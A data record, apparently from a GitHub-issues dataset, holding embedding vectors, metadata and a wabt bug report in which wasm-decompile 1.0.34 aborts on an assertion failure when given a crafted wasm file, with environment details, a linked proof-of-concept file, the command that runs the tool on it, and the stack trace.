-0.0011419254587963223, -0.005023770499974489, -0.023561201989650726, 0.01152099296450615, -0.0010173836490139365, 0.006855060812085867, 0.005030786618590355, -0.006104302126914263, 0.014187240041792393, 0.0034573504235595465, 0.011506959795951843, 0.035671576857566833, -0.004073042888194323, 0.01556246168911457, 0.016137810423970222, 0.007921559736132622, 0.009023141115903854, -0.013583825901150703, -0.020712528377771378, -0.0023224414326250553, 0.0026539680548012257, 0.021821126341819763, -0.007205883041024208, 0.021807093173265457, 0.020754626020789146, 0.013071626424789429, 0.013738187961280346, 0.014208288863301277, 0.007212899159640074, 0.008005756884813309, 0.03564351052045822, 0.00785139575600624, -0.000059694546507671475, -0.006763847079128027, -0.004893966484814882, -0.011640272103250027, 0.01332421787083149, 0.007837362587451935, 0.029693569988012314, 0.009591472335159779, 0.022298242896795273, 0.0010410641552880406, 0.010159803554415703, 0.0012120899045839906, 0.019800391048192978, 0.015730855986475945, -0.002911822171881795, -0.008840713649988174, 0.028276249766349792, -0.007395326625555754, 0.02974970079958439, 0.007065554149448872, -0.017372703179717064, 0.0004911507130600512, -0.013808351941406727, -0.007788247428834438, -0.011149121448397636, 0.009626554325222969, -0.0030012817587703466, 0.010342231020331383, -0.0027329029981046915, -0.014846784994006157, 0.008125036023557186, 0.007465491071343422, 0.003936222288757563, 0.007184833753854036, 0.02514691837131977, -0.012271751649677753, -0.010686037130653858, -0.006353385746479034, -0.006837519817054272, 0.011296466924250126, 0.020712528377771378, -0.008658286184072495, 0.002069849520921707, -0.013043560087680817, -0.004297568928450346, -0.01415917370468378, -0.004129174165427685, -0.004981671925634146, 0.009002091363072395, 0.0042940606363117695, -0.008546022698283195, -0.01427143719047308, -0.0066761416383087635, -0.01633427105844021, -0.01359785906970501, -0.011015809141099453, -0.014608225785195827, 0.014594193547964096, -0.0333140529692173, -0.006798929534852505, -0.007893494330346584, -0.008195200935006142, -0.014320552349090576, -0.014720489270985126, -0.0010682528372853994, 0.014860818162560463, 0.01640443503856659, 0.0029995276127010584, -0.008672318421304226, 0.011415746062994003, -0.01549229770898819, 0.022761328145861626, -0.0033538579009473324, 0.004037960898131132, -0.020109115168452263, -0.007935592904686928, 0.02850077487528324, -0.008307463489472866, 0.020291542634367943, 0.03575577214360237, -0.015576494857668877, 0.005381608847528696, 0.009907212108373642, -0.017723524942994118, 0.008223266340792179, 0.01953376643359661, 0.004476488102227449, 0.018509365618228912, 0.015955382958054543, 0.009865113534033298, 0.0075005735270679, 0.005844693630933762, 0.002159309107810259, -0.007914543151855469, 0.010398362763226032, -0.006181482691317797, -0.003346841549500823, -0.008560055866837502, 0.02598888985812664, -0.03634515404701233, -0.007570737972855568, -0.005192164797335863, 0.00871441699564457, -0.03634515404701233, -0.00031552050495520234, 0.014369667507708073, 0.01259450800716877, -0.0018856680253520608, -0.02518901601433754, 0.000047854307922534645, -0.012973396107554436, 0.0055605280213057995, -0.0074163759127259254, 0.008854745887219906, -0.01452402863651514, 0.013590842485427856, 0.006493714172393084, 0.01581505313515663, 0.016502665355801582, 0.0021435220260173082, -0.005774529185146093, 0.002804821589961648, -0.0014181977603584528, 0.01133856549859047, -0.03179850056767464, -0.0007827715016901493, 0.001647109049372375, -0.0060201045125722885, -0.0017032405594363809, 0.010265050455927849, 0.008756515569984913, -0.011871814727783203, -0.013225987553596497, -0.01745690032839775, 0.009893178939819336, -0.029104189947247505, -0.018242741003632545, -0.0065919444896280766, 0.00009307744767284021, -0.001801470760256052, 0.01390658225864172, -0.006230597849935293, -0.013057593256235123, -0.00011741572234313935, 0.0061569251120090485, -0.00037801064900122583, -0.0010068590054288507, 0.0010779004078358412, -0.020038949325680733, 0.0022715721279382706, 0.023940090090036392, -0.00672525679692626, 0.0470101423561573, 0.006455123890191317, 0.0011954257497563958, 0.0030293476302176714, 0.00062095484463498, 0.004469471517950296, 0.012061258777976036, -0.0032398407347500324, 0.004725571721792221, 0.0038976320065557957, 0.0021189646795392036, -0.004388782661408186, 0.020151212811470032, -0.03188269957900047, -0.004630849696695805, -0.004588751122355461, 0.0006345491856336594, 0.000837587402202189, -0.007690017111599445, -0.0011524501023814082, 0.002001439221203327, -0.000444666831754148, 0.006048170384019613, -0.0030012817587703466, -0.007086603436619043, 0.0033257920295000076, -0.002808329649269581, -0.002876739948987961, -0.003957271575927734, 0.004708030726760626, 0.014930982142686844, 0.0026750173419713974, 0.002604852896183729, 0.016250072047114372, 0.02234034240245819, 0.0024539995938539505, 0.01518357452005148, 0.020319607108831406, -0.011184203438460827, -0.029328715056180954, 0.002199653536081314, -0.004844851326197386, -0.015239705331623554, 0.003096003783866763, 0.027167651802301407, -0.01603958010673523, -0.007991723716259003, 0.0018891762010753155, -0.0006148154498077929, 0.014608225785195827, -0.024080418050289154, 0.0027381654363125563, 0.012180537916719913, 0.014481930062174797, -0.001442755339667201, -0.012068275362253189, -0.00609728554263711, -0.011506959795951843, -0.0048659006133675575, 0.0003477522695902735, -0.004427372943609953, -0.0002385589323239401, -0.0074233924970030785, -0.0037748441100120544, -0.00632531987503171, 0.008742483332753181, 0.03278080374002457, 0.0004608923336490989, -0.001419074833393097, 0.006184990983456373, -0.008665301837027073, 0.0010235230438411236, -0.01770949177443981, 0.01250329427421093, -0.011036858893930912, -0.022761328145861626, 0.01387150026857853, 0.008026806637644768, -0.03185463324189186, -0.010314165614545345, -0.0038765824865549803, -0.017372703179717064, 0.00718132546171546, -0.0028258708771318197, -0.015772955492138863, -0.02158256620168686, -0.005441248416900635, -0.0005534216179512441, 0.001841815304942429, 0.014299502596259117, 0.011899881064891815, 0.01727447286248207, -0.03693453595042229, 0.0037818606942892075, -0.005164099391549826, -0.0022470145486295223, 0.0017076258081942797, 0.004213371779769659, 0.009514291770756245, 0.006107810419052839, -0.006844536401331425, 0.019561832770705223, -0.014846784994006157, -0.0074304090812802315, 0.00473960442468524, -0.016558796167373657, -0.017035914584994316, -0.030900398269295692, 0.01155607495456934, -0.01848130114376545, -0.030339082702994347, 0.01873389258980751, -0.022649064660072327, 0.0025171474553644657, -0.0005152697558514774, -0.012299817986786366, -0.008139069192111492, 0.01512744277715683, -0.0009059977019205689, 0.006570895202457905, 0.007219915743917227, -0.006069219671189785, 0.01898648403584957, 0.012271751649677753, -0.012769918888807297, -0.011892864480614662, 0.011366630904376507, 0.017330603674054146, 0.002211932325735688, 0.003532777074724436, -0.0026153777725994587, -0.023154249414801598, -0.015983447432518005, 0.024473339319229126, 0.02288762480020523, 0.023827826604247093, 0.02617131732404232, -0.009507275186479092, 0.0043326509185135365, -0.004592259414494038, -0.022466637194156647, 0.04066728055477142, -0.0014155665412545204, 0.01164728868752718, -0.0406111478805542, -0.0026592304930090904, -0.0221298485994339, -0.019126811996102333, -0.014860818162560463, -0.016825420781970024, 0.017260439693927765, -0.0018383070128038526, 0.005676299333572388, -0.009247667156159878, 0.00384150049649179, 0.011605190113186836, -0.0007257629185914993, -0.009591472335159779, -0.016081677749753, 0.023084085434675217, 0.005343018565326929, -0.014383699744939804, -0.004879933316260576, 0.00004760763476951979, 0.011843749321997166, 0.0068164705298841, -0.008742483332753181, 0.014622258953750134, 0.022691164165735245, 0.0055079045705497265, -0.013331234455108643, -0.02580646239221096, 0.011549058370292187, -0.00771808298304677, -0.0013024264480918646, 0.020179279148578644, -0.0033029885962605476, 0.0007134841289371252, 0.005114984232932329, 0.027574606239795685, 0.00777421472594142, -0.0015348460292443633, -0.02610115334391594, -0.0003898509021382779, -0.020179279148578644, -0.0036555647384375334, -0.01818661019206047, -0.00541318254545331, 0.005879776086658239, 0.015534396283328533, 0.0028574448078870773, -0.04237929359078407, 0.008160118944942951, -0.010538691654801369, -0.005764004774391651, 0.012917264364659786, -0.010131738148629665, -0.012657656334340572, -0.003739762119948864, -0.018874220550060272, -0.009851080365478992, -0.03244401514530182, -0.00030236467137001455, 0.025750331580638885 ]
null
null
null
null
null
null
null
null
null
[ "WebAssembly", "wabt" ]
## Environments **OS** : Ubuntu 18.04 5.4.0-150-generic **Commit** : e97d53c5fcbb604fc36432df4fc117d13558d7fd **Version** : 1.0.34 ## Vulnerability Description **Affected Tool** : wasm-decompile **Affected Version** : <= 1.0.34 **Impact** : Denial of Service * The assertion '!empty()' fail in /include/wabt/intrusive-list.h in wabt 1.0.34 can cause a denial of service(assertion failure) via a crafted wasm file. ## PoC **1. Input File** [wasm-decompile-DOS-poc01.zip](https://github.com/WebAssembly/wabt/files/13198250/wasm-decompile-DOS-poc01.zip) **2. Reproduce** ```shell $ ~/wabt/bin/wasm-decompile wasm-decompile-DOS-poc01 ``` **3. Stack Trace** ```shell $ ~/wabt/bin/wasm-decompile wasm-decompile-DOS-poc01 wasm-decompile: ../../../../include/wabt/intrusive-list.h:394: typename intrusive_list<T>::const_reference wabt::intrusive_list<wabt::Expr>::front() const [T = wabt::Expr]: Assertion `!empty()' failed. Aborted ```
wasm-decompile: Assertion `!empty()' failure cause DoS
https://api.github.com/repos/WebAssembly/wabt/issues/2316/comments
0
2023-10-29T14:03:47
2023-10-29T14:03:47Z
https://github.com/WebAssembly/wabt/issues/2316
1,967,004,525
2,316
false
This is a GitHub Issue repo:wabt owner:WebAssembly Title : wasm-decompile: Assertion `!empty()' failure cause DoS Issue date: --- start body --- ## Environments **OS** : Ubuntu 18.04 5.4.0-150-generic **Commit** : e97d53c5fcbb604fc36432df4fc117d13558d7fd **Version** : 1.0.34 ## Vulnerability Description **Affected Tool** : wasm-decompile **Affected Version** : <= 1.0.34 **Impact** : Denial of Service * The assertion '!empty()' fail in /include/wabt/intrusive-list.h in wabt 1.0.34 can cause a denial of service(assertion failure) via a crafted wasm file. ## PoC **1. Input File** [wasm-decompile-DOS-poc01.zip](https://github.com/WebAssembly/wabt/files/13198250/wasm-decompile-DOS-poc01.zip) **2. Reproduce** ```shell $ ~/wabt/bin/wasm-decompile wasm-decompile-DOS-poc01 ``` **3. Stack Trace** ```shell $ ~/wabt/bin/wasm-decompile wasm-decompile-DOS-poc01 wasm-decompile: ../../../../include/wabt/intrusive-list.h:394: typename intrusive_list<T>::const_reference wabt::intrusive_list<wabt::Expr>::front() const [T = wabt::Expr]: Assertion `!empty()' failed. Aborted ``` --- end body ---
1,133
[ -0.02204134687781334, 0.018989237025380135, -0.011216129176318645, -0.02249239757657051, 0.03136306256055832, -0.001782590290531516, 0.005897488910704851, 0.0369260236620903, 0.0011201094603165984, 0.00790842343121767, -0.023800445720553398, 0.02948368526995182, 0.0033640870824456215, -0.0030878183897584677, 0.017169998958706856, 0.009960704483091831, -0.011689732782542706, 0.005457714200019836, -0.006630446296185255, -0.04913446307182312, -0.005172048695385456, 0.02028224989771843, -0.005423885304480791, 0.011201093904674053, 0.0071754660457372665, 0.00998325739055872, 0.009524689055979252, -0.006010251585394144, -0.01876371167600155, -0.009802836924791336, 0.00022294123482424766, 0.004931488540023565, -0.01574167236685753, 0.04868341237306595, 0.017816506326198578, 0.034370068460702896, 0.0497659370303154, 0.06711635738611221, 0.0051833251491189, 0.012907569296658039, -0.028310952708125114, -0.08756399154663086, -0.0389106459915638, 0.0001608042948646471, 0.005311122629791498, 0.02425149641931057, 0.005995216313749552, -0.01840287074446678, 0.015861952677369118, 0.020131899043917656, 0.029002564027905464, -0.014952332712709904, -0.01909448206424713, -0.08046745508909225, 0.05184076726436615, -0.02494310773909092, 0.03867008537054062, 0.004318810999393463, 0.017966855317354202, -0.011907740496098995, -0.018312660977244377, -0.006232018116861582, 0.014411072246730328, 0.030265506356954575, 0.007107808254659176, 0.030100122094154358, -0.005063044838607311, 0.015922091901302338, -0.015358278527855873, 0.01802699640393257, -0.03527216985821724, -0.018493082374334335, -0.021515121683478355, 0.03265607729554176, 0.038339316844940186, -0.009622416459023952, -0.004330087453126907, -0.015967197716236115, -0.011283786967396736, 0.015651462599635124, -0.044503677636384964, 0.012479071505367756, -0.03232530504465103, -0.017996925860643387, -0.027123186737298965, 0.01265949197113514, -0.04591696709394455, -0.08648146688938141, -0.018553221598267555, -0.047270119190216064, 0.01844797655940056, 0.014538870193064213, -0.011667179875075817, 0.011907740496098995, -0.009366821497678757, 0.03942183777689934, -0.042068000882864, 0.004995387513190508, -0.023800445720553398, 0.0021763199474662542, -0.025409193709492683, 0.015358278527855873, -0.010765078477561474, 0.009013498201966286, -0.011554417200386524, -0.0036365969572216272, 0.02796514704823494, -0.0021312148310244083, 0.028145568445324898, 0.1609349101781845, -0.0026442850939929485, -0.010532035492360592, -0.03578336164355278, -0.007461131550371647, 0.034430209547281265, 0.01587698794901371, 0.007378438953310251, -0.021199386566877365, -0.05403588339686394, -0.011892705224454403, -0.022898344323039055, -0.021815821528434753, -0.0036178031004965305, 0.01977105811238289, -0.0006046899361535907, 0.027453957125544548, -0.017666155472397804, -0.015636427327990532, -0.025349052622914314, -0.022281907498836517, -0.028641724959015846, -0.023454640060663223, -0.03193439543247223, -0.03743721544742584, 0.007239365018904209, -0.027499062940478325, -0.01832769624888897, 0.05599043518304825, 0.0006986588705331087, 0.004025628324598074, -0.05448693409562111, -0.027950113639235497, 0.014877158217132092, 0.022702889516949654, -0.018417906016111374, 0.007946010679006577, -0.00917136576026678, 0.0016219033859670162, -0.03151341527700424, 0.024025971069931984, -0.01117854192852974, -0.004476679023355246, 0.025845209136605263, 0.022191697731614113, 0.017470700666308403, -0.007130361162126064, 0.009945669211447239, 0.013629251159727573, 0.0014499402604997158, 0.008690244518220425, -0.0014715531142428517, -0.028762003406882286, 0.013471382670104504, -0.03900085762143135, -0.03773791342973709, -0.022717924788594246, 0.002933709416538477, 0.0316036231815815, -0.000034827226045308635, 0.013456348329782486, -0.00489765964448452, 0.026852555572986603, 0.03148334473371506, 0.019380148500204086, -0.007077738177031279, 0.0018192380666732788, 0.023860584944486618, 0.0323854461312294, -0.0025521956849843264, 0.00009208953269990161, 0.011855117976665497, 0.01808713562786579, 0.03223509341478348, -0.0193500779569149, 0.014290791936218739, 0.004269947297871113, 0.02343960478901863, -0.0329868458211422, 0.0053299167193472385, -0.004164702259004116, -0.005029215943068266, 0.020778406411409378, -0.0013926192186772823, -0.012937639839947224, 0.012140783481299877, 0.012381344102323055, -0.01316316518932581, -0.044954728335142136, -0.001106953714042902, 0.01574167236685753, 0.010697420686483383, -0.012178370729088783, -0.013997608795762062, 0.007141637150198221, -0.019004272297024727, 0.01921476237475872, 0.01206560805439949, 0.024777721613645554, 0.024973178282380104, -0.012193406000733376, -0.009306681342422962, -0.02760430797934532, -0.012930122204124928, -0.002728857100009918, -0.02411618083715439, 0.015019990503787994, 0.0035388690885156393, -0.023845551535487175, -0.029122844338417053, 0.018057065084576607, 0.012433966621756554, -0.012238510884344578, -0.011659662239253521, -0.04832257330417633, -0.04032393917441368, -0.026852555572986603, -0.03482111915946007, 0.002037246013060212, -0.020688194781541824, 0.0267623458057642, 0.02286827377974987, -0.0059989751316607, 0.03124278411269188, 0.00853237695991993, 0.005220912862569094, -0.012885017320513725, -0.016583632677793503, -0.02575499936938286, -0.003864001715555787, -0.016237827017903328, 0.005123184993863106, 0.02310883440077305, -0.0355428010225296, -0.02847633883357048, -0.02110917679965496, 0.049344953149557114, -0.019876303151249886, 0.0015993508277460933, -0.0004886383539997041, 0.027423886582255363, -0.0014931659679859877, -0.0050743212923407555, 0.008960875682532787, -0.01304288487881422, 0.002636767691001296, -0.011358962394297123, 0.02494310773909092, 0.021530156955122948, 0.0022984796669334173, -0.030070051550865173, 0.01580181159079075, -0.00004025980524602346, -0.035242099314928055, 0.047901593148708344, 0.00040242186514660716, -0.018177345395088196, -0.019380148500204086, 0.0018521272577345371, -0.0038301728200167418, -0.016147617250680923, 0.04946523532271385, -0.02450709231197834, -0.021890997886657715, -0.017846575006842613, -0.006487613543868065, -0.0026518027298152447, 0.037316933274269104, 0.03473091125488281, 0.003121647285297513, -0.04534563794732094, 0.016087478026747704, -0.031784042716026306, -0.01883888803422451, 0.02040253020823002, -0.016042372211813927, 0.004333846271038055, 0.00743106147274375, 0.003991799429059029, -0.007239365018904209, -0.026972835883498192, -0.011125919409096241, 0.010171194560825825, -0.03458055853843689, 0.02721339650452137, 0.020613020285964012, 0.013321032747626305, 0.03749735280871391, 0.00207859231159091, -0.035633012652397156, -0.009336750954389572, -0.03124278411269188, 0.012291133403778076, -0.0050743212923407555, 0.006371092051267624, -0.06284640729427338, 0.006916111800819635, 0.006168119143694639, -0.009735179133713245, 0.013787118718028069, -0.023093799129128456, 0.05141978710889816, -0.03548265993595123, 0.025980524718761444, -0.020447634160518646, -0.027198361232876778, -0.011043226346373558, 0.0379183366894722, -0.04200786352157593, -0.027198361232876778, -0.0051946016028523445, -0.03584350273013115, -0.0007489322451874614, -0.051630277186632156, -0.0008170596556738019, 0.02198120765388012, -0.025349052622914314, -0.025589613243937492, 0.0075400653295218945, -0.049044255167245865, -0.014734324999153614, 0.0191546231508255, -0.0032926707062870264, -0.013223305344581604, -0.018478047102689743, 0.007773108314722776, -0.06519187241792679, -0.04687920957803726, -0.0009866735199466348, 0.026972835883498192, -0.013493935577571392, 0.004908936098217964, 0.022447293624281883, -0.007577653042972088, -0.012802324257791042, 0.008539894595742226, -0.013554075732827187, -0.03223509341478348, -0.006604135036468506, 0.0009660004288889468, 0.00030892278300598264, 0.0009302922408096492, 0.0053449515253305435, -0.003676063846796751, 0.036956094205379486, 0.014516317285597324, -0.02620605006814003, 0.008569964207708836, 0.004055698402225971, -0.009900564327836037, 0.021244490519165993, -0.011283786967396736, -0.01575670763850212, 0.022627713158726692, -0.0026442850939929485, 0.033919017761945724, -0.029408510774374008, 0.016658809036016464, -0.03876029700040817, -0.05316385254263878, 0.012230993248522282, -0.01464411523193121, 0.05466735363006592, -0.03187425434589386, -0.029558859765529633, -0.016087478026747704, -0.04363164305686951, -0.00790842343121767, 0.009148812852799892, -0.03779805451631546, 0.01587698794901371, -0.013313515111804008, 0.008622587658464909, 0.03250572457909584, -0.03996310010552406, 0.02930326573550701, -0.023319324478507042, 0.0015598839381709695, 0.03686588257551193, -0.025664789602160454, -0.015019990503787994, -0.00036342476960271597, 0.03854980692267418, -0.05412609130144119, -0.056802328675985336, -0.027318641543388367, 0.026100805029273033, -0.01070493832230568, -0.037888266146183014, 0.03836938738822937, -0.04215821251273155, -0.013869810849428177, -0.025860244408249855, 0.044954728335142136, 0.002586024347692728, 0.0042398772202432156, 0.036324623972177505, 0.013997608795762062, -0.003441141452640295, 0.03873022645711899, 0.006051597651094198, 0.01637314260005951, -0.0035426279064267874, -0.007032633293420076, 0.02294345013797283, 0.04886383190751076, 0.01467418484389782, 0.017215104773640633, -0.02462737262248993, -0.010509482584893703, 0.010998121462762356, -0.04793166369199753, -0.003809499554336071, 0.022206733003258705, 0.024341706186532974, 0.01763608492910862, -0.0035482661332935095, -0.029558859765529633, 0.002409362932667136, 0.028581583872437477, -0.014704255387187004, 0.021755682304501534, 0.03370852768421173, -0.006709380075335503, 0.009457031264901161, -0.0028002734761685133, -0.06507159024477005, -0.02462737262248993, -0.010652315802872181, -0.002779600443318486, 0.02330428920686245, 0.003144199727103114, 0.023890655487775803, -0.022327013313770294, -0.006998804397881031, -0.005555442068725824, -0.04182744026184082, -0.06146318465471268, 0.02028224989771843, 0.056411415338516235, 0.008803007192909718, -0.009532206691801548, 0.04119597002863884, -0.006649239920079708, 0.0010674868244677782, 0.0031987016554921865, -0.014087819494307041, -0.0029412268195301294, -0.021439947187900543, -0.0102689228951931, -0.028010252863168716, -0.03148334473371506, 0.021439947187900543, -0.012584316544234753, 0.04011344909667969, 0.015952162444591522, 0.02997984178364277, 0.01319323480129242, -0.04669879004359245, -0.00009003396553453058, -0.023980865254998207, -0.028551513329148293, 0.01877874694764614, 0.002634888282045722, 0.02273295819759369, 0.008795490488409996, -0.0042210835963487625, -0.0253791231662035, -0.013020331971347332, -0.00935930386185646, -0.028371093794703484, -0.012125748209655285, -0.015456006862223148, -0.016177687793970108, -0.006675551645457745, 0.002148129278793931, -0.010283957235515118, -0.013411242514848709, 0.0034336240496486425, -0.000009345501894131303, 0.024401847273111343, -0.00022341108706314117, -0.009148812852799892, -0.04895404353737831, -0.035753291100263596, 0.026747310534119606, -0.00018617590831127018, -0.0009857339318841696, -0.016012301668524742, 0.025935418903827667, 0.012772254645824432, 0.04062464088201523, -0.03286656737327576, 0.00863010436296463, -0.008705279789865017, 0.016673844307661057, -0.02506338804960251, -0.041857510805130005, 0.058937299996614456, -0.01769622601568699, -0.02703297697007656, -0.0117498729377985, -0.0588470920920372, 0.0023492227774113417, -0.02658192627131939, 0.006341021973639727, -0.013809670694172382, 0.012682043947279453, 0.004739792086184025, 0.016974544152617455, 0.042428843677043915, -0.022266872227191925, -0.014599010348320007, -0.0022533745504915714, 0.039030928164720535, 0.007404750213027, 0.013223305344581604, 0.022342048585414886, 0.00393917690962553, -0.01405023131519556, -0.026882626116275787, -0.0004747779166791588, 0.010118572041392326, -0.017906716093420982, 0.029137879610061646, -0.013794636353850365, 0.006325987167656422, -0.009487100876867771, 0.012674526311457157, 0.0012544849887490273, 0.00022893176355864853, 0.01225354615598917, 0.03151341527700424, -0.0483827143907547, 0.009051085449755192, -0.03464069962501526, 0.01789168082177639, 0.003980522975325584, 0.0033415344078093767, -0.010787631385028362, 0.020673159509897232, -0.0020691954996436834, 0.0012657612096518278, -0.011005639098584652, -0.002700666431337595, 0.0053411927074193954, 0.0016933197621256113, 0.0014931659679859877, 0.018868956714868546, 0.007149154786020517, -0.030566208064556122, -0.0031573553569614887, -0.015425936318933964, -0.0067883143201470375, -0.02298855409026146, 0.007043909747153521, 0.0031047328375279903, 0.011945327743887901, 0.017936784774065018, -0.05695267766714096, -0.0166888777166605, 0.02267281897366047, 0.024522127583622932, 0.0025766275357455015, 0.008825560100376606, -0.016733983531594276, 0.04125611111521721, -0.026476681232452393, 0.006352298427373171, 0.00259166257455945, -0.017921751365065575, 0.03169383481144905, -0.010719973593950272, -0.02022210881114006, 0.03208474442362785, 0.009562276303768158, -0.014441141858696938, 0.009081155993044376, 0.008276781998574734, 0.03349803760647774, -0.007393473759293556, 0.02041756547987461, 0.02280813455581665, -0.001363488845527172, -0.016147617250680923, 0.02401093579828739, -0.005333675537258387, 0.019515464082360268, -0.015861952677369118, 0.033046986907720566, -0.015012472867965698, -0.008660174906253815, -0.0008974031079560518, 0.010517000220716, -0.011238682083785534, -0.023454640060663223, 0.021785752847790718, 0.013689391314983368, -0.00821664184331894, -0.0434512235224247, 0.026221085339784622, -0.012869982048869133, -0.0026724757626652718, 0.033979158848524094, -0.01304288487881422, -0.0010477533796802163, -0.019440287724137306, 0.0163881778717041, 0.020883651450276375, -0.023454640060663223, 0.025499403476715088, 0.02217666245996952, -0.06669537723064423, -0.0034110713750123978, -0.004179737064987421, 0.011930292472243309, 0.024747652933001518, -0.025815138593316078, -0.01706475391983986, -0.013313515111804008, -0.03659525141119957, -0.016403213143348694, 0.005273535382002592, -0.012922604568302631, -0.038399454206228256, -0.02506338804960251, 0.053133781999349594, 0.040985479950904846, -0.0001616265217307955, -0.01287749968469143, -0.004160943441092968, 0.012869982048869133, 0.014433625154197216, -0.008810524828732014, -0.016703912988305092, -0.025935418903827667, -0.0028359817806631327, -0.012809841893613338, 0.009043567813932896, 0.03427985683083534, 0.024176321923732758, -0.013561593368649483, 0.003927900455892086, 0.021034000441432, 0.01996651478111744, 0.0017233898397535086, -0.012298651039600372, 0.0393015556037426, 0.03572322055697441, 0.0005915343062952161, 0.02683752030134201, -0.04221835359930992, -0.04690928012132645, -0.02438681200146675, 0.014110371470451355, 0.004085768014192581, -0.034430209547281265, -0.047029562294483185, -0.01688433438539505, 0.005307364277541637, -0.0011990433558821678, 0.011704767122864723, -0.03343789651989937, 0.0014226892963051796, -0.002931830007582903, -0.022221768274903297, -0.02443191595375538, -0.012636939063668251, 0.028205707669258118, -0.02608576975762844, -0.011952845379710197, 0.01838783733546734, 0.0038790367543697357, -0.002773962216451764, 0.03545258939266205, -0.026251154020428658, -0.005991457961499691, -0.009787801653146744, 0.016703912988305092, 0.0012112592812627554, -0.0016538528725504875, 0.04170716181397438, 0.0007216812227852643, 0.016974544152617455, 0.0014640355948358774, 0.013944986276328564, -0.04131625220179558, 0.02810046263039112, -0.019605673849582672, -0.02047770470380783, -0.03148334473371506, -0.0028472580015659332, 0.002888604300096631, -0.017786435782909393, -0.009246541187167168, 0.018297625705599785, 0.016162652522325516, -0.0008226978243328631, -0.024837862700223923, 0.024657441303133965, 0.02229694277048111, -0.01921476237475872, 0.005634375847876072, -0.019109517335891724, 0.022567573934793472, 0.028070393949747086, -0.012058090418577194, 0.026191014796495438, 0.023078763857483864, -0.0323854461312294, -0.015102683566510677, -0.011960363015532494, -0.023830516263842583, -0.009058603085577488, -0.03779805451631546, 0.020748335868120193, -0.02147001586854458, -0.026927731931209564, -0.005559200886636972, 0.01011105440557003, 0.006423714570701122, -0.005405091680586338, -0.048172224313020706, 0.0033171025570482016, 0.017350420355796814, -0.022071417421102524, -0.00378694711253047, 0.005777208600193262, 0.0009960704483091831, -0.006498889997601509, 0.008622587658464909, 0.023394500836730003, 0.0019357595592737198, -0.012230993248522282, -0.03488126024603844, 0.022266872227191925, -0.02274799346923828, 0.02589031495153904, 0.006292158272117376, -0.028521444648504257, 0.008660174906253815, 0.005841107573360205, -0.003916624002158642, 0.023229114711284637, -0.01680915802717209, -0.00281906733289361, 0.011479241773486137, 0.004322569817304611, -0.01492978073656559, -0.0069386642426252365, -0.0052133952267467976, 0.00020320777548477054, 0.00034932943526655436, 0.026055699214339256, 0.02292841486632824, 0.026191014796495438, -0.007393473759293556, 0.024672476574778557, -0.014561422169208527, 0.01580181159079075, 0.024597302079200745, 0.01726020872592926, 0.00010313087841495872, -0.03301691636443138, 0.011629592627286911, -0.005386298056691885, -0.024416882544755936, 0.02217666245996952, 0.006889800541102886, 0.007472408004105091, 0.036114130169153214, -0.05752400681376457, 0.012772254645824432, -0.003281394252553582, 0.01373449619859457, -0.014162993989884853, 0.0007893388392403722, 0.026596959680318832, -0.029874596744775772, 0.011832565069198608, 0.02401093579828739, -0.01467418484389782, -0.025529474020004272, 0.05505826324224472, -0.010547070764005184, -0.0006225440301932395, -0.01990637369453907, 0.009562276303768158, 0.026672136038541794, -0.008073808625340462, -0.018222451210021973, 0.021755682304501534, 0.027168290689587593, -0.03500153869390488, -0.004021869506686926, -0.0017045960994437337, -0.0193500779569149, 0.0017647361382842064, -0.009366821497678757, -0.011095848865807056, 0.0361442007124424, 0.009344268590211868, 0.024837862700223923, 0.0008006151183508337, 0.013524005189538002, 0.015313173644244671, 0.0010590296005830169, -0.0018671622965484858, -0.018944133073091507, -0.007182983681559563, 0.015456006862223148, 0.02122945711016655, 0.013689391314983368, 0.024086112156510353, -0.03433999791741371, 0.005604305770248175, -0.011546899564564228, 0.04477430507540703, 0.019259868189692497, 0.029634036123752594, -0.012606869451701641, -0.014471212401986122, -0.010547070764005184, -0.0013315394753590226, 0.020943790674209595, -0.013659320771694183, 0.02142491191625595, -0.014147959649562836, 0.009953186847269535, -0.017560910433530807, 0.05475756525993347, -0.017711259424686432, 0.00006889095675433055, -0.03716658428311348, -0.018598327413201332, 0.00841209664940834, -0.033046986907720566, -0.003715530736371875, -0.00535246916115284, -0.010968050919473171, -0.004307535011321306, 0.00802870374172926, 0.04811208322644234, 0.0031498379539698362, 0.04089526832103729, -0.017996925860643387, 0.007558859419077635, -0.007551341783255339, -0.01644831895828247, -0.005480267107486725, 0.002072954084724188, 0.012591834180057049, 0.027950113639235497, -0.004044421948492527, -0.02116931602358818, 0.007149154786020517, -0.006168119143694639, -0.00863010436296463, -0.03068648837506771, 0.003935418091714382, -0.019740989431738853, -0.0007376559660769999, -0.017861610278487206, -0.011351444758474827, 0.01971091888844967, -0.018613362684845924, 0.015546216629445553, 0.00020543952996376902, -0.023033659905195236, 0.004600717686116695, 0.030596276745200157, 0.0008001452661119401, 0.006104220636188984, -0.009246541187167168, 0.00675824424251914, 0.016718948259949684, -0.01278728898614645, 0.027002906426787376, -0.010862805880606174, -0.010915428400039673, -0.008765419945120811, 0.00907363835722208, -0.001663249684497714, -0.03629455342888832, -0.015546216629445553, 0.005604305770248175, 0.009178883396089077, 0.008652657270431519, -0.015922091901302338, -0.020838545635342598, -0.02701794169843197, 0.004089526832103729, -0.026566890999674797, -0.0023210321087390184, -0.025183668360114098, -0.005852383561432362, -0.0015777379740029573, 0.0022270632907748222, -0.008254229091107845, 0.006630446296185255, 0.022657783702015877, -0.01335861999541521, -0.024852897971868515, -0.0075400653295218945, -0.01351648848503828, -0.0341595783829689, -0.020011618733406067, -0.02010182850062847, 0.0009063301258720458, 0.030506066977977753, 0.026822485029697418, -0.023770375177264214, 0.01380215398967266, -0.011351444758474827, 0.010148642584681511, 0.001409533666446805, -0.0027589271776378155, -0.021064070984721184, -0.014922263100743294, -0.002937468234449625, 0.0008024945273064077, -0.0011746113887056708, -0.011441654525697231, -0.03169383481144905, -0.005626858212053776, 0.0043413639068603516, 0.011862635612487793, -0.006014010403305292, -0.0027401335537433624, -0.03433999791741371, -0.028942424803972244, 0.002862293040379882, -0.005239706486463547, 0.04468409717082977, -0.02671723999083042, -0.0024356741923838854, 0.009299163706600666, 0.024537162855267525, -0.0015805570874363184, 0.0007165129645727575, 0.011960363015532494, -0.04606731981039047, -0.020567914471030235, -0.033738598227500916, -0.026115840300917625, -0.033678457140922546, 0.004066974390298128, -0.01921476237475872, -0.0006902016466483474, -0.026747310534119606, 0.0075287893414497375, 0.010795148089528084, 0.02140987664461136, -0.007472408004105091, -0.022853238508105278, 0.014162993989884853, 0.009231505915522575, -0.033678457140922546, 0.0025785069447010756, -0.009652486070990562, 0.003668546210974455, 0.011945327743887901, 0.005205877590924501, 0.011035708710551262, 